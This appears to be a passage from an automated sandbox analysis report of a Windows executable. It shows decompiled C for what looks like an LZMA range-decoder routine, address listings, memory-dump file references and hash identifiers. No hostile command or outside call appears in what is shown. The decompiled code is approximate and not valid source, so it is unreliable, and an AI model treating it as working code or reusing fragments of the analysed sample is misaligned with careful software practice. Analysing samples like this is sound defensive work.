												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














              0x00000000
              0x00406efa
              0x00406efa
              0x00406efe
              0x00406f1f
              0x00406f26
              0x00406f2c
              0x00406f32
              0x00406f44
              0x00406f4a
              0x00406f4f
              0x00000000
              0x00406f00
              0x00406f06
              0x004072c7
              0x004072c7
              0x004072c7
              0x004072ca
              0x004072ca
              0x004072ca
              0x004072d0
              0x004072d6
              0x004072dc
              0x004072f6
              0x004072f9
              0x004072ff
              0x0040730a
              0x0040730c
              0x004072de
              0x004072de
              0x004072ed
              0x004072f1
              0x004072f1
              0x00407316
              0x00000000
              0x00000000
              0x00407318
              0x0040731c
              0x004074cb
              0x004074e1
              0x004074e9
              0x004074f0
              0x004074f2
              0x004074f9
              0x004074fd
              0x004074fd
              0x00407328
              0x0040732f
              0x00407337
              0x0040733a
              0x0040733d
              0x0040733d
              0x00407343
              0x00407343
              0x00406adf
              0x00406adf
              0x00406adf
              0x00406ae8
              0x00000000
              0x00000000
              0x00406aee
              0x00000000
              0x00406af9
              0x00000000
              0x00000000
              0x00406b02
              0x00406b05
              0x00406b08
              0x00406b0c
              0x00000000
              0x00000000
              0x00406b12
              0x00406b15
              0x00406b17
              0x00406b18
              0x00406b1b
              0x00406b1d
              0x00406b1e
              0x00406b20
              0x00406b23
              0x00406b28
              0x00406b2d
              0x00406b36
              0x00406b49
              0x00406b4c
              0x00406b58
              0x00406b80
              0x00406b82
              0x00406b90
              0x00406b90
              0x00406b94
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406b84
              0x00406b84
              0x00406b87
              0x00406b88
              0x00406b88
              0x00000000
              0x00406b84
              0x00406b5e
              0x00406b63
              0x00406b63
              0x00406b6c
              0x00406b74
              0x00406b77
              0x00000000
              0x00406b7d
              0x00406b7d
              0x00000000
              0x00406b7d
              0x00000000
              0x00406b9a
              0x00406b9a
              0x00406b9e
              0x0040744a
              0x00000000
              0x0040744a
              0x00406ba7
              0x00406bb7
              0x00406bba
              0x00406bbd
              0x00406bbd
              0x00406bbd
              0x00406bc0
              0x00406bc4
              0x00000000
              0x00000000
              0x00406bc6
              0x00406bcc
              0x00406bf6
              0x00406bfc
              0x00406c03
              0x00000000
              0x00406c03
              0x00406bd2
              0x00406bd5
              0x00406bda
              0x00406bda
              0x00406be5
              0x00406bed
              0x00406bf0
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406c35
              0x00406c3b
              0x00406c3e
              0x00406c4b
              0x00406c53
              0x00000000
              0x00000000
              0x00406c0a
              0x00406c0a
              0x00406c0e
              0x00407459
              0x00000000
              0x00407459
              0x00406c1a
              0x00406c25
              0x00406c25
              0x00406c25
              0x00406c28
              0x00406c2b
              0x00406c2e
              0x00406c33
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x004072ca
              0x004072ca
              0x004072d0
              0x004072d6
              0x004072dc
              0x004072f6
              0x004072f9
              0x004072ff
              0x0040730a
              0x0040730c
              0x004072de
              0x004072de
              0x004072ed
              0x004072f1
              0x004072f1
              0x00407316
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406c5b
              0x00406c5d
              0x00406c60
              0x00406cd1
              0x00406cd4
              0x00406cd7
              0x00406cde
              0x00406ce8
              0x004072c7
              0x004072c7
              0x00000000
              0x004072c7
              0x00406c62
              0x00406c66
              0x00406c69
              0x00406c6b
              0x00406c6e
              0x00406c71
              0x00406c73
              0x00406c76
              0x00406c78
              0x00406c7d
              0x00406c80
              0x00406c83
              0x00406c87
              0x00406c8e
              0x00406c91
              0x00406c98
              0x00406c9c
              0x00406ca4
              0x00406ca4
              0x00406ca4
              0x00406c9e
              0x00406c9e
              0x00406c9e
              0x00406c93
              0x00406c93
              0x00406c93
              0x00406ca8
              0x00406cab
              0x00406cc9
              0x00406ccb
              0x00000000
              0x00406cad
              0x00406cad
              0x00406cb0
              0x00406cb3
              0x00406cb6
              0x00406cb8
              0x00406cb8
              0x00406cb8
              0x00406cbb
              0x00406cbe
              0x00406cc0
              0x00406cc1
              0x00406cc4
              0x00000000
              0x00406cc4
              0x00000000
              0x00000000
              0x00000000
              0x00406f64
              0x00406f68
              0x00406f8b
              0x00406f8e
              0x00406f91
              0x00406f9b
              0x00406f6a
              0x00406f6a
              0x00406f6d
              0x00406f70
              0x00406f73
              0x00406f80
              0x00406f83
              0x00406f83
              0x004072c7
              0x004072c7
              0x004072c7
              0x00000000
              0x004072c7
              0x00000000
              0x00406fa7
              0x00406fab
              0x00000000
              0x00000000
              0x00406fb1
              0x00406fb5
              0x00000000
              0x00000000
              0x00406fbb
              0x00406fbd
              0x00406fc1
              0x00406fc1
              0x00406fc4
              0x00406fc8
              0x00000000
              0x00000000
              0x00407018
              0x0040701c
              0x00407023
              0x00407026
              0x00407029
              0x00407033
              0x004072c7
              0x004072c7
              0x004072c7
              0x00000000
              0x004072c7
              0x004072c7
              0x0040701e
              0x00000000
              0x00000000
              0x0040703f
              0x00407043
              0x0040704a
              0x0040704d
              0x00407050
              0x00407045
              0x00407045
              0x00407045
              0x00407053
              0x00407056
              0x00407059
              0x00407059
              0x0040705c
              0x0040705f
              0x00407062
              0x00407062
              0x00407065
              0x0040706c
              0x00407071
              0x00000000
              0x00000000
              0x004070ff
              0x004070ff
              0x00407103
              0x004074a1
              0x00000000
              0x004074a1
              0x00407109
              0x0040710c
              0x0040710f
              0x00407113
              0x00407116
              0x0040711c
              0x0040711e
              0x0040711e
              0x0040711e
              0x00407121
              0x00407124
              0x00000000
              0x00000000
              0x00406cf4
              0x00406cf4
              0x00406cf8
              0x00407465
              0x00000000
              0x00407465
              0x00406cfe
              0x00406d01
              0x00406d04
              0x00406d08
              0x00406d0b
              0x00406d11
              0x00406d13
              0x00406d13
              0x00406d13
              0x00406d16
              0x00406d19
              0x00406d19
              0x00406d1c
              0x00406d1f
              0x00000000
              0x00000000
              0x00406d25
              0x00406d2b
              0x00000000
              0x00000000
              0x00406d31
              0x00406d31
              0x00406d35
              0x00406d38
              0x00406d3b
              0x00406d3e
              0x00406d41
              0x00406d42
              0x00406d45
              0x00406d47
              0x00406d4d
              0x00406d50
              0x00406d53
              0x00406d56
              0x00406d59
              0x00406d5c
              0x00406d5f
              0x00406d7b
              0x00406d7e
              0x00406d81
              0x00406d84
              0x00406d8b
              0x00406d8f
              0x00406d91
              0x00406d95
              0x00406d61
              0x00406d61
              0x00406d65
              0x00406d6d
              0x00406d72
              0x00406d74
              0x00406d76
              0x00406d76
              0x00406d98
              0x00406d9f
              0x00406da2
              0x00000000
              0x00406da8
              0x00000000
              0x00406da8
              0x00000000
              0x00406dad
              0x00406dad
              0x00406db1
              0x00407471
              0x00000000
              0x00407471
              0x00406db7
              0x00406dba
              0x00406dbd
              0x00406dc1
              0x00406dc4
              0x00406dca
              0x00406dcc
              0x00406dcc
              0x00406dcc
              0x00406dcf
              0x00406dd2
              0x00406dd2
              0x00406dd2
              0x00406dd8
              0x00000000
              0x00000000
              0x00406dda
              0x00406ddd
              0x00406de0
              0x00406de3
              0x00406de6
              0x00406de9
              0x00406dec
              0x00406def
              0x00406df2
              0x00406df5
              0x00406df8
              0x00406e10
              0x00406e13
              0x00406e16
              0x00406e19
              0x00406e19
              0x00406e1c
              0x00406e20
              0x00406e22
              0x00406dfa
              0x00406dfa
              0x00406e02
              0x00406e07
              0x00406e09
              0x00406e0b
              0x00406e0b
              0x00406e25
              0x00406e2c
              0x00406e2f
              0x00000000
              0x00406e31
              0x00000000
              0x00406e31
              0x00406e2f
              0x00406e36
              0x00406e36
              0x00406e36
              0x00406e36
              0x00000000
              0x00000000
              0x00406e71
              0x00406e71
              0x00406e75
              0x0040747d
              0x00000000
              0x0040747d
              0x00406e7b
              0x00406e7e
              0x00406e81
              0x00406e85
              0x00406e88
              0x00406e8e
              0x00406e90
              0x00406e90
              0x00406e90
              0x00406e93
              0x00406e96
              0x00406e96
              0x00406e9c
              0x00406e3a
              0x00406e3a
              0x00406e3d
              0x00000000
              0x00406e3d
              0x00406e9e
              0x00406e9e
              0x00406ea1
              0x00406ea4
              0x00406ea7
              0x00406eaa
              0x00406ead
              0x00406eb0
              0x00406eb3
              0x00406eb6
              0x00406eb9
              0x00406ebc
              0x00406ed4
              0x00406ed7
              0x00406eda
              0x00406edd
              0x00406edd
              0x00406ee0
              0x00406ee4
              0x00406ee6
              0x00406ebe
              0x00406ebe
              0x00406ec6
              0x00406ecb
              0x00406ecd
              0x00406ecf
              0x00406ecf
              0x00406ee9
              0x00406ef0
              0x00406ef3
              0x00000000
              0x00406ef5
              0x00000000
              0x00406ef5
              0x00000000
              0x00407182
              0x00407182
              0x00407186
              0x004074ad
              0x00000000
              0x004074ad
              0x0040718c
              0x0040718f
              0x00407192
              0x00407196
              0x00407199
              0x0040719f
              0x004071a1
              0x004071a1
              0x004071a1
              0x004071a4
              0x00000000
              0x00000000
              0x00406f52
              0x00406f52
              0x00406f55
              0x004072c7
              0x004072c7
              0x004072c7
              0x00000000
              0x004072c7
              0x00000000
              0x00407291
              0x00407295
              0x004072b7
              0x004072ba
              0x004072c4
              0x004072c7
              0x004072c7
              0x004072c7
              0x00000000
              0x004072c7
              0x004072c7
              0x00407297
              0x0040729a
              0x0040729e
              0x004072a1
              0x004072a1
              0x004072a4
              0x00000000
              0x00000000
              0x0040734e
              0x00407352
              0x00407370
              0x00407370
              0x00407370
              0x00407377
              0x0040737e
              0x00407385
              0x00407385
              0x00000000
              0x00407385
              0x00407354
              0x00407357
              0x0040735a
              0x0040735d
              0x00407364
              0x004072a8
              0x004072a8
              0x004072ab
              0x00000000
              0x00000000
              0x0040743f
              0x00407442
              0x00407343
              0x00000000
              0x00000000
              0x00407079
              0x0040707b
              0x00407082
              0x00407083
              0x00407085
              0x00407088
              0x00000000
              0x00000000
              0x00407090
              0x00407093
              0x00407096
              0x00407098
              0x0040709a
              0x0040709a
              0x0040709b
              0x0040709e
              0x004070a5
              0x004070a8
              0x004070b6
              0x00000000
              0x00000000
              0x0040738c
              0x0040738c
              0x0040738f
              0x00407396
              0x00000000
              0x00000000
              0x0040739b
              0x0040739b
              0x0040739f
              0x004074d7
              0x00000000
              0x004074d7
              0x004073a5
              0x004073a8
              0x004073ab
              0x004073af
              0x004073b2
              0x004073b8
              0x004073ba
              0x004073ba
              0x004073ba
              0x004073bd
              0x004073c0
              0x004073c0
              0x004073c0
              0x004073c0
              0x004073c3
              0x004073c3
              0x004073c7
              0x00407427
              0x0040742a
              0x0040742f
              0x00407430
              0x00407432
              0x00407434
              0x00407437
              0x00407343
              0x00407343
              0x00000000
              0x00407349
              0x00407343
              0x004073c9
              0x004073cf
              0x004073d2
              0x004073d5
              0x004073d8
              0x004073db
              0x004073de
              0x004073e1
              0x004073e4
              0x004073e7
              0x004073ea
              0x00407403
              0x00407406
              0x00407409
              0x0040740c
              0x00407410
              0x00407412
              0x00407412
              0x00407413
              0x00407416
              0x004073ec
              0x004073ec
              0x004073f4
              0x004073f9
              0x004073fb
              0x004073fe
              0x004073fe
              0x00407419
              0x00407420
              0x00000000
              0x00407422
              0x00000000
              0x00407422
              0x00000000
              0x004070be
              0x004070c1
              0x004070f7
              0x00407227
              0x00407227
              0x00407227
              0x00407227
              0x0040722a
              0x0040722a
              0x0040722d
              0x0040722f
              0x004074b9
              0x00000000
              0x004074b9
              0x00407235
              0x00407238
              0x00000000
              0x00000000
              0x0040723e
              0x00407242
              0x00407245
              0x00407245
              0x00407245
              0x00000000
              0x00407245
              0x004070c3
              0x004070c5
              0x004070c7
              0x004070c9
              0x004070cc
              0x004070cd
              0x004070cf
              0x004070d1
              0x004070d4
              0x004070d7
              0x004070ed
              0x004070f2
              0x0040712a
              0x0040712a
              0x0040712e
              0x0040715a
              0x0040715c
              0x00407163
              0x00407166
              0x00407169
              0x00407169
              0x0040716e
              0x0040716e
              0x00407170
              0x00407173
              0x0040717a
              0x0040717d
              0x004071aa
              0x004071aa
              0x004071ad
              0x004071b0
              0x00407224
              0x00407224
              0x00407224
              0x00000000
              0x00407224
              0x004071b2
              0x004071b8
              0x004071bb
              0x004071be
              0x004071c1
              0x004071c4
              0x004071c7
              0x004071ca
              0x004071cd
              0x004071d0
              0x004071d3
              0x004071ec
              0x004071ee
              0x004071f1
              0x004071f2
              0x004071f5
              0x004071f7
              0x004071fa
              0x004071fc
              0x004071fe
              0x00407201
              0x00407203
              0x00407206
              0x0040720a
              0x0040720c
              0x0040720c
              0x0040720d
              0x00407210
              0x00407213
              0x004071d5
              0x004071d5
              0x004071dd
              0x004071e2
              0x004071e4
              0x004071e7
              0x004071e7
              0x00407216
              0x0040721d
              0x004071a7
              0x004071a7
              0x004071a7
              0x004071a7
              0x00000000
              0x0040721f
              0x00000000
              0x0040721f
              0x0040721d
              0x00407130
              0x00407133
              0x00407135
              0x00407138
              0x0040713b
              0x0040713e
              0x00407140
              0x00407143
              0x00407146
              0x00407146
              0x00407149
              0x00407149
              0x0040714c
              0x00407153
              0x00407127
              0x00407127
              0x00407127
              0x00407127
              0x00000000
              0x00407155
              0x00000000
              0x00407155
              0x00407153
              0x004070d9
              0x004070dc
              0x004070de
              0x004070e1
              0x00000000
              0x00000000
              0x00406e40
              0x00406e40
              0x00406e44
              0x00407489
              0x00000000
              0x00407489
              0x00406e4a
              0x00406e4d
              0x00406e50
              0x00406e53
              0x00406e56
              0x00406e59
              0x00406e5c
              0x00406e5e
              0x00406e61
              0x00406e64
              0x00406e67
              0x00406e69
              0x00406e69
              0x00406e69
              0x00000000
              0x00000000
              0x00406fcb
              0x00406fcb
              0x00406fcf
              0x00407495
              0x00000000
              0x00407495
              0x00406fd5
              0x00406fd8
              0x00406fdb
              0x00406fde
              0x00406fe0
              0x00406fe0
              0x00406fe0
              0x00406fe3
              0x00406fe6
              0x00406fe9
              0x00406fec
              0x00406fef
              0x00406ff2
              0x00406ff3
              0x00406ff5
              0x00406ff5
              0x00406ff5
              0x00406ff8
              0x00406ffb
              0x00406ffe
              0x00407001
              0x00407001
              0x00407001
              0x00407004
              0x00407006
              0x00407006
              0x00000000
              0x00000000
              0x00407248
              0x00407248
              0x00407248
              0x0040724c
              0x00000000
              0x00000000
              0x00407252
              0x00407255
              0x00407258
              0x0040725b
              0x0040725d
              0x0040725d
              0x0040725d
              0x00407260
              0x00407263
              0x00407266
              0x00407269
              0x0040726c
              0x0040726f
              0x00407270
              0x00407272
              0x00407272
              0x00407272
              0x00407275
              0x00407278
              0x0040727b
              0x0040727e
              0x00407281
              0x00407285
              0x00407287
              0x0040728a
              0x00000000
              0x0040728c
              0x00407009
              0x00407009
              0x00000000
              0x00407009
              0x0040728a
              0x004074bf
              0x00000000
              0x00000000
              0x00406aee
              0x004074f6
              0x004074f6
              0x00000000
              0x004074f6
              0x00407343
              0x004072ca
              0x004072c7
              0x00000000
              0x00406efe

              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: db5198ca4190c6b334929519d9078d0b7c25f309867be5a342d9eedfd0dff6d3
              • Instruction ID: b4a429368d408adc735ccef7c69d02ca95e21b2dffe456e9be617d596e32585a
              • Opcode Fuzzy Hash: db5198ca4190c6b334929519d9078d0b7c25f309867be5a342d9eedfd0dff6d3
              • Instruction Fuzzy Hash: 44711371D04228CFDF28CFA8C954BADBBB1FB44305F15806AD856BB281D7386986DF45
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00407018, Relevance: 5.2, APIs: 4, Instructions: 170COMMON
              Download Yara Rule
              C-Code - Quality: 98%
              			E00407018() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004074FE))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
